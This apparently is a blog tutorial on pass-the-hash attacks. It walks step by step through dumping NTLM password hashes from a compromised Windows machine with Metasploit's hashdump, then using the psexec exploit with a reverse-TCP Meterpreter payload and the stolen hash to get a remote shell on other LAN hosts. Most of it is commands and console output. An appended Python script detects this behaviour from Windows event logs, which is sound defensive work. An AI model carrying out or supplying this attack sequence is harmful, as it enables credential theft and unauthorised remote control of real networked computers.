Pass The Hash

July 14, 2015

Hi once again,

For this method, all we need is the user name from a fully compromised PC on the SMB network (LAN). We recently exploited a Windows XP SP2 machine, so we have one. Now that we know its user name, we want to move through the LAN to other PCs.

Let’s begin…

I assume you have the Metasploit console open and the target already configured there, so let us start from the Meterpreter session. I will give the full commands without explaining each one, because you know the basics.

We're going to use "post/windows/gather/hashdump". You can locate it by searching in the terminal. Since we already have CMD access, we could even read the system login information file (known as SAM) directly. The hash is in NTLM format, which is easy to crack. For our purpose, though, we want to pass the hash directly, so we use hashdump in the terminal.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Now that we have the hash, let's use the `psexec` exploit to pass it. Open a second terminal and start msfconsole there. We know we need `psexec`, but we don't know its full path, so let's search for it.

msf > search psexec


Name                       Description
----                       -----------
windows/smb/psexec         Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay      Microsoft Windows SMB Relay Code Execution

YES! We got it. Now, let’s use it.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(psexec) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    xx.xx.xx.xx      yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPass                   no        The password for the specified username
SMBUser  Administrator    yes       The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST     xx.xx.xx.xx      yes       The local address
LPORT     443              yes       The local port

Exploit target:

Id  Name
--  ----
0   Automatic

Set SMBPass to the hash we dumped:
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xx.xx.xx.xx:443 -> xx.xx.xx.xx:1045)

Yeah! We got it.
meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


Voila! One more down. Now we have full access to it.

— Multi Thinker
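
The psexec output above shows a payload being uploaded and a short-lived service being created right after the NTLM authentication. As an added example (not part of the original post and not Metasploit code), the following Python code flags a service installed within 60 seconds of a remote NTLM network logon. Assumptions: events are already parsed into dicts from a host recent enough to log event IDs 4624 and 7045; the sample events, the 60-second window and the Windows-directory path heuristic are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed correlation window
# Assumption: the uploaded .exe sits directly in the Windows directory (ADMIN$).
ROOT_EXE = re.compile(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$", re.I)

# Constructed sample events, pre-parsed from one host's Security and System logs.
EVENTS = [
    {"time": "2015-07-14T10:00:01", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "IpAddress": "192.0.2.10"},
    {"time": "2015-07-14T10:00:03", "id": 7045, "ServiceName": "XKqtKinn",
     "ImagePath": r"%SYSTEMROOT%\KoVCxCjx.exe"},
    {"time": "2015-07-14T10:20:00", "id": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "svc_backup",
     "IpAddress": "192.0.2.20"},
    {"time": "2015-07-14T10:20:05", "id": 7045, "ServiceName": "BackupAgent",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
    {"time": "2015-07-14T12:00:00", "id": 7045, "ServiceName": "Updater",
     "ImagePath": r"C:\Windows\upd.exe"},
]

def find_remote_service_installs(events, window=WINDOW):
    """Return alerts for services installed shortly after a remote NTLM network logon."""
    logons, alerts = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 4624 and ev.get("LogonType") == 3
                and ev.get("AuthenticationPackageName") == "NTLM"
                and ev.get("IpAddress") not in (None, "-", "127.0.0.1", "::1")):
            logons.append((ts, ev))
        elif ev["id"] == 7045:  # "A service was installed in the system"
            recent = [l for t, l in logons if timedelta(0) <= ts - t <= window]
            if recent:
                src = recent[-1]  # most recent qualifying logon
                in_root = bool(ROOT_EXE.match(ev["ImagePath"]))
                alerts.append({
                    "service": ev["ServiceName"], "image": ev["ImagePath"],
                    "user": src["TargetUserName"], "source_ip": src["IpAddress"],
                    "severity": "high" if in_root else "medium",
                })
    return alerts

if __name__ == "__main__":
    for alert in find_remote_service_installs(EVENTS):
        print(alert)
```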

1 Comment
  1. Authentication fails ????
